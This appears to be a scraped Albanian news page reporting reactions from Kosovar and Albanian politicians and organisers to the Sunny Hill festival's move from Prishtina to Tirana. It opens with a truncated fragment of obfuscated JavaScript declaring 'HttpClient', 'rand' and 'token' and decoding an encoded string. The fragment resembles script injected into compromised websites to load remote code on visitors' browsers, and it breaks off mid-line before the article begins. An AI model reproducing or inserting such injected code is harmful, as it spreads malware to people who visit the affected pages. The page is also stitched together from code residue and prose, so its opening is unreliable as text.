;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Cilat ishin reagimet pro dhe kundër festivalit “Sunny Hill”?

By

“Sunny Hill” nuk do të mbahet në Prishtinë.

Kështu njoftoi mbrëmë organizatori Dukagjin Lipa, i cili është edhe organizator i këtij festivali.

Lipa tha se faji për dështimin e këtij organizimi është tek institucionet e Kosovës.

Ai i ka drejtuar edhe një letër krerëve më të lartë të shtetit.

Zhvvendosjen e festivalit e konfirmoi edhe këngëtarja me famë botërore Dua Lipa, që njëherit është edhe e bija e organizatorit Dukagjin Lipa.

Ajo tha se ky organizim nga kryeqyteti i Kosovës, do të zhvendoset në Tiranë.

Pas njoftimit, i menjëhershëm ka qenë reagimi i kryetarit të Prishtinës Përparim Rama.

Rama tha se një vendim i tillë nga qeveria do t’i shkaktojë dëm kryeqytetit, duke shtuar se kjo është një humbje jo vetëm për Prishtinën, por për gjithë Kosovën, njofton Klankosova.tv.

I pari i Prishtinës e ftoi ekzekutivin që të reflektojë dhe dhe “Sunny Hill” t’i kthehet Prishtinës.

Edhe e dyta e Prishtinës Donjeta Sahatçiu, tha se “Sunny Hill” duhet të mbahet në kryeqytet, duke theksuar se Prishtina e ka zemrën e hapur për Duan.

Ndërkaq, Ministria e Administrimit të Pushtetit Lokal, me anë të një reagimi kanë thënë se nuk bëhet fjalë për anulim nga ana e kësaj ministrie, derisa janë proces të shqyrtimit të këtij akti.

MAPL tregon se pse ka kërkuar sqarime shtesë nga Komuna e Prishtinës.

Derisa kjo ministri thekson që kanë munguar disa dokumente esenciale në aplikacion.

Reagim ka pasur edhe nga kreu i Partisë Demokratike të Kosovës Memli Krasniqi, i cili tha se Lëvizja Vetëvendosje dhe Albin Kurti i mbyllën derën të vetmit festival të muzikës me përmasa botërore në vendin tonë.

Kryetari i Lidhjes Demokratike të Kosovës Lumir Abdixhiku, tha se Qeveria Kurti ia dha goditjen më të rëndë jetës kulturore në Prishtinë e Kosovë.

Lidhur me zhvendosjen e festivalit “Sunny Hill” në Tiranë u deklarua edhe Donjeta Miftari, këshilltare e presidentës Vjosa Osmani.

Miftari tha se Presidenca “luftoi” për ta mbajtur festivalin “Sunny Hill” në Prishtinë, meqë sipas saj, rinia jonë pret dhe meriton më mirë.

E për mbajtjen e “Sunny Hill” në Prishtinë është edhe Viola von Cramon.

Raportuesja për Kosovën në Parlamentin Evropian, tha se ndjehet keq me faktin që Sunny Hill nuk do të mbahet këtë verë në Prishtinë.

Ajo fajet për këtë ia lë Qeverisë së Kosovës.

Përveç reagimeve pro ka pasur edhe reagime kundër.

Shefi i asamblistëve të Lëvizjes Vetëvendosje, Gëzim Sveçla, deklaroi se për ta ishte i papritur vendimi i sotëm i kompanisë Sunny Hill për ta zhvendosur festivalin në Tiranë, meqë siç theksoi në Klan Kosova, edhe sot në mëngjes kanë qenë në kontakte me ta për ta gjetur zgjidhjen e duhur për të dalë nga ngecja që ishte krijuar.

Ai tha se si grup i asamblistëve fillimisht kishin vendosur unanimisht që ta përkrahnin atë rend ditë ku flitej për dhënien në shfrytëzim të parcelës 17 hektarëshe për 99 vjet, por që në seancë kur i është prezantuar dokumentacioni, u shpreh se kanë hasur në shumë parregullsi.

E faji sipas grupit të asamblistëve të Vetëvendosjes në Kuvendin Komunal të Prishtinës, faji për dështimin e mbajtjes së festivalit ndërkombëtar “Sunny Hill”, i takon kryetarit të kryeqytetit Përparim Rama.

Sipas tyre Rama kishte refuzuar të bashkëpunonte për të gjetur një zgjidhje.

Derisa nga organizatorët u tha se zhvendosja e festivalit për në Tiranë ishte e paralajmëruar.

Alban Kastrati nga “Sunny Hill”, ka thënë në Klan Kosova se është paralajmëruar kryeministri i Kosovës, Albin Kurti në lidhje me mundësinë e zhvendosjes së festivalit nga Prishtina në Tiranë.

E pas këtyre zhvillimeve ka reaguar edhe kryeministri i Shqipërisë Edi Rama.

Rama e ka quajtur lajm të mirë zhvendosjen e “Sunny Hill” nga Prishtina në Tiranë.

Ai tha se “S’ka si Tirona jo”.

Gëzimin lidhur me këtë zhvillim e ka shprehur edhe kryebashkiaku i Tiranës Erion Veliaj.

Veliaj tha se do të jemi bashkë si shqiptarë të mirë sot në Tiranë dhe nesër në Prishtinë, njofton Klankosova.tv.

Artikuj të ngjashëm